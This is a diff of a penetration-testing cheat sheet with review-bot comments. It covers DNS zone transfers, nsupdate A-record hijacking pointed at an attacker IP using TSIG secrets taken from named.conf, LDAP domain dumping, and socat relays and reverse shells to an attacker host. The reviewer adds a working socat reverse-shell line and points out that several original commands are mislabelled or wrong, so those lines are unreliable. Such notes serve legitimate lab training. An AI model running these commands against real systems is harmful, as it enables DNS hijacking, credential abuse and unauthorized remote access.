Compare commits


No commits in common. "3f066cb6639a2cb05c0e46e5b6cffc9e716b6d83" and "74e0c3e76a886c164c955ca0d8f79bbbb258d1d3" have entirely different histories.

3 changed files with 34 additions and 47 deletions

View File

@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr
drill @$TARGET_DNS $DOMAIN axfr
```
There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration.
A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters.
* [subrake](https://github.com/hash3liZer/Subrake.git)
## Join a Domain
Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
```sh
nsupdate
server <DNS-IP>
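Review bot: both variants of the subrake line need work: `sudbdomain` is a typo in the one-line form, and in the two-line form the sentence "A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters." floats above the bullet with nothing introducing it; collapse to a single bullet such as `* [subrake](https://github.com/hash3liZer/Subrake.git): subdomain enumeration and validation tool`. The "## Join a Domain" line also overstates what follows: an `nsupdate` dynamic update adds or overwrites an A record on the zone's authoritative server, it does not join a Windows domain, and "needs cert and Pk" is left unexplained. State what is actually required, a TSIG shared secret (`-y`, as used in the later hunk) or a SIG(0) key file (`-k`), and that the update only succeeds if the server's update policy (`allow-update`/`update-policy`) accepts the client or key.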
@ -22,11 +22,11 @@ update add <sub.domain.com> 1234 A $ATTACKER_IP
send
quit
```
Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup.
* Check domain by querying the subdomain's A record via dig/drill/nslookup
### Found Secrets for Keys
Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain.
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
```sh
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
Creating key...
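Review bot: the "Found Secrets for Keys" sentence is garbled in both variants ("secrets can be found secret like a key", "possiblity of found secret"); suggest: "If a TSIG key is found, for example in `/etc/bind/named.conf`, it can be used to send signed dynamic updates." BIND's `key` statement carries `algorithm` and `secret`, so the `-y <hash algorithm>:<name of the key>:<secret>` form is right (e.g. `hmac-sha256:<keyname>:<base64-secret>`), but a secret on the command line is visible in the process list and shell history; `nsupdate -k <keyfile>` avoids that. For the check after `send`/`quit`, give the concrete command instead of naming three tools: `dig @<DNS-IP> <sub.domain.com> A +short`.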
@ -34,10 +34,10 @@ namefromtext
keycreate
server <domain>
update add <subdomain>.<toplevel-domain>. 86400 IN A $ATTACKER_IP
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
send
```
*Hint*: Copy the lines, every space counts as it has to be exactly like in the example
Copy the lines, every space counts as it has to be exactly like in the example
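Review bot: `Creating key...`, `namefromtext` and `keycreate` are debug output printed by `nsupdate -d`, not commands to type, so the hint "Copy the lines, every space counts" will have readers pasting output back into the prompt; split the block into the commands (`server`, `update add`, `send`) and, if wanted, the expected output. Two placeholder problems as well: `server <domain>` must be the DNS server's address (the `<DNS-IP>` used above), not the domain, and `<subdomain>.<toplevel-domain>.` is misnamed, since in `mail.snoopy.htb.` the zone is `snoopy.htb`, not a TLD; `<subdomain>.<domain>.` matches the earlier `<sub.domain.com>`. The TTL also changes between hunks (1234 vs 86400); either is fine, but say the number is the TTL.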

View File

@ -2,7 +2,6 @@
## Get Domain
Use the `ldapsearch` tool to receive information from an LDAP server.
```sh
ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts
```
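Review bot: this hunk's only change is the sentence "Use the `ldapsearch` tool to receive information from an LDAP server." under "## Get Domain"; whichever side is kept, the heading should not sit directly on a bare command. A one-liner that says what the command does is more useful than the generic sentence: `-x` is an anonymous simple bind, `-s base` limits the scope to the root DSE, and `namingcontexts` returns the domain's DN (the `DC=<DC>,DC=<ORG>` that the later `-b` argument needs). "receive" should read "retrieve".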
@ -17,8 +16,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=<DC>,DC=<ORG>' -D '<DC>\<user>' -W > o
## Domain Dump
If a set of LDAP credentials is known dump the domain via
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
The result is a set of HTML files, take a look at them.
* Take a look at the genreated HTML files
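Review bot: "If a set of credentials are known via" is a fragment (subject/verb disagreement, no main clause); the other variant, "If a set of LDAP credentials is known dump the domain via", needs a comma after "known". Fix the `genreated` typo. The context line `-D '<DC>\<user>'` reuses `<DC>` for the NetBIOS domain name while `-b 'DC=<DC>,DC=<ORG>'` uses it for a DN component; pick a distinct placeholder (`<domain>\<user>`, as the `ldapdomaindump` line already does). Since `--no-json --no-grep` leaves only the HTML output, say where the files land (the current directory unless `-o` is given) so "take a look at them" is actionable.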

View File

@ -92,49 +92,37 @@ echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:1
### Socat
#### Local PortForwarding via Socat
Open a local port (here 80) on a network interface
```sh
./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80
```
#### Open a reverse shell via Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell on attacker
```sh
sudo nc -lvnp 443
```
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell
```sh
sudo nc -lvnp 443
```
#### Jumpserver via Socat
* Relay on jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Relay on a jumpserver via
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
#### Quiet Port Forwarding Through a Relay Server via Socat
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
#### Forward Local Port via Socat
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
* In need of a Download on target, expose a port on the attacker via relay
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
```sh
socat tcp-l:80,fork tcp:$ATTACKER_IP:80
```
### Chisel
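Review bot: the "Open a reverse shell via Socat" block does not open a shell: `./socat tcp-l:8000 tcp:<attacker-IP>:443 &` on the target only relays whatever connects to its port 8000 out to the attacker's `nc -lvnp 443`, and "Attacking bind shell" mislabels that listener. A socat reverse shell is `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker-IP>:443` on the target with `socat file:$(tty),raw,echo=0 tcp-l:443` (or the `nc` listener shown) on the attacker; if the relay is what is meant, rename the section. Other prose/command mismatches: under "Local PortForwarding" the text says "Open a local port (here 80)" but `TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80` listens on 8080 and forwards to local 80, binding all interfaces unless `bind=<addr>` is added; "Forward Local Port via Socat" actually exposes the attacker's port 80 on the relay, so say where `socat tcp-l:80,fork tcp:$ATTACKER_IP:80` runs (the relay), that binding 80 needs root, and add `reuseaddr` as the other relays do. The `kill %1` note only works from the shell that launched the job; `kill $!` right after the `&` or `pkill socat` is more robust.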